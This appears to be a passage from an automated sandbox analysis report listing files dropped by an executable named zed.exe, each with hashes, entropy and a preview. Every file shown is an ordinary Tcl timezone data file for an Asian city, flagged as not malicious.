                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2055
                                                                                                                                                                                                                                            Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                                            MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                                            SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                                            SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                                            SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1664
                                                                                                                                                                                                                                            Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                                            MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                                            SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                                            SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                                            SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                                            MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                                            SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                                            SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                                            SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):369
                                                                                                                                                                                                                                            Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                                            MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                                            SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                                            SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                                            SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):273
                                                                                                                                                                                                                                            Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                                            MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                                            SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                                            SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                                            SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                                            MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                                            SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                                            SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                                            SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1668
                                                                                                                                                                                                                                            Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                                            MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                                            SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                                            SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                                            SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                                                            Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                                            MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                                            SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                                            SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                                            SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                                            MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                                            SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                                            SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                                            SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):148
                                                                                                                                                                                                                                            Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
                                                                                                                                                                                                                                            MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                                            SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                                            SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                                            SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                                            MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                                            SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                                            SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                                            SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2117
                                                                                                                                                                                                                                            Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                                            MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                                            SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                                            SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                                            SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                                                                            Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                                            MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                                            SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                                            SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                                            SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):985
                                                                                                                                                                                                                                            Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                                            MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                                            SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                                            SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                                            SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Seoul) {.. {-9223372036854775808 30472 0 LMT}.. {-1948782472 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-767350800 32400 0 KST}.. {-681210000 36000 1 KDT}.. {-672228000 32400 0 KST}.. {-654771600 36000 1 KDT}.. {-640864800 32400 0 KST}.. {-623408400 36000 1 KDT}.. {-609415200 32400 0 KST}.. {-588848400 36000 1 KDT}.. {-577965600 32400 0 KST}.. {-498128400 30600 0 KST}.. {-462702600 34200 1 KDT}.. {-451733400 30600 0 KST}.. {-429784200 34200 1 KDT}.. {-418296600 30600 0 KST}.. {-399544200 34200 1 KDT}.. {-387451800 30600 0 KST}.. {-368094600 34200 1 KDT}.. {-356002200 30600 0 KST}.. {-336645000 34200 1 KDT}.. {-324552600 30600 0 KST}.. {-305195400 34200 1 KDT}.. {-293103000 30600 0 KST}.. {-264933000 32400 0 KST}.. {547578000 36000 1 KDT}.. {560883600 32400 0 KST}.. {579027600 36000 1 KDT}.. {592333200 32400 0 KST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):981
                                                                                                                                                                                                                                            Entropy (8bit):4.16042656890735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Te3vvZJzHjwH6kHp7FH32AzHjZBHNHlQHuHxmHUjH6zHj2HBHeC:5ovZZO7lLpT24
                                                                                                                                                                                                                                            MD5:A266AA43A84FD5E4890BC77AA4E240D0
                                                                                                                                                                                                                                            SHA1:CD88C5D451CD7D3F50C9B36FDD47C84D20377441
                                                                                                                                                                                                                                            SHA-256:3AABB42D9EFE95D906B7F34640E7815919A1A20979EBB6EC1527FCAA3B09B22A
                                                                                                                                                                                                                                            SHA-512:13AE48F58C9AF24002F0FE4F28BF96B10EE0ED293E0DE9D29BCEBAAE102B2EA818F42CA4069544A254C95444A48604EC57E6AB2BEBDA4B5E72C82B49E61AD0A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Shanghai) {.. {-9223372036854775808 29143 0 LMT}.. {-2177481943 28800 0 CST}.. {-1600675200 32400 1 CDT}.. {-1585904400 28800 0 CST}.. {-933667200 32400 1 CDT}.. {-922093200 28800 0 CST}.. {-908870400 32400 1 CDT}.. {-888829200 28800 0 CST}.. {-881049600 32400 1 CDT}.. {-767869200 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-650016000 28800 0 CST}.. {515527200 32400 1 CDT}.. {527014800 28800 0 CST}.. {545162400 32400 1 CDT}.. {558464400 28800 0 CST}.. {577216800 32400 1 CDT}.. {589914000 28800 0 CST}.. {608666400 32400 1 CDT}.. {621968400 28800 0 CST}.. {640116000 32400 1 CDT}.. {653418000 28800 0 CST}.. {671565600 32400 1 CDT}.. {684867600 28800 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):372
                                                                                                                                                                                                                                            Entropy (8bit):4.436676898144829
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKfbSDm2OHxdoHvm5vWOb/MVSYyF/3MesF5XJSx0dMVSSFF8kvScHS:MB862nbGmdHDCvsvDTMsF/CFDMx/HHbe
                                                                                                                                                                                                                                            MD5:C3D13D921E4C6E475910E5080B761C32
                                                                                                                                                                                                                                            SHA1:8C5AE73C4098D03908E5D567FD7C4D827601D718
                                                                                                                                                                                                                                            SHA-256:05C76B58A4E356FD358E24FBC71FAE98DCB18C441C8D8CBB13A18D4F6E406062
                                                                                                                                                                                                                                            SHA-512:3A620597469D31577ECAAA098C95C244F0C288ABACE9E8964D8641154C1893967EFBD7211A41751D0D4CC1B0B9A2286F11738EFB7D01F110A4826BBE1844A2EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Singapore) {.. {-9223372036854775808 24925 0 LMT}.. {-2177477725 24925 0 SMT}.. {-2038200925 25200 0 +07}.. {-1167634800 26400 1 +0720}.. {-1073028000 26400 0 +0720}.. {-894180000 27000 0 +0730}.. {-879665400 32400 0 +09}.. {-767005200 27000 0 +0730}.. {378664200 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2064
                                                                                                                                                                                                                                            Entropy (8bit):3.7913177223006698
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5HJeidmbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxwy:5HSv+0j6lua2Gg/3gO8UoOZU2Wc/pKf
                                                                                                                                                                                                                                            MD5:B4FA38E884A85F6BD47C8BB02BB0500C
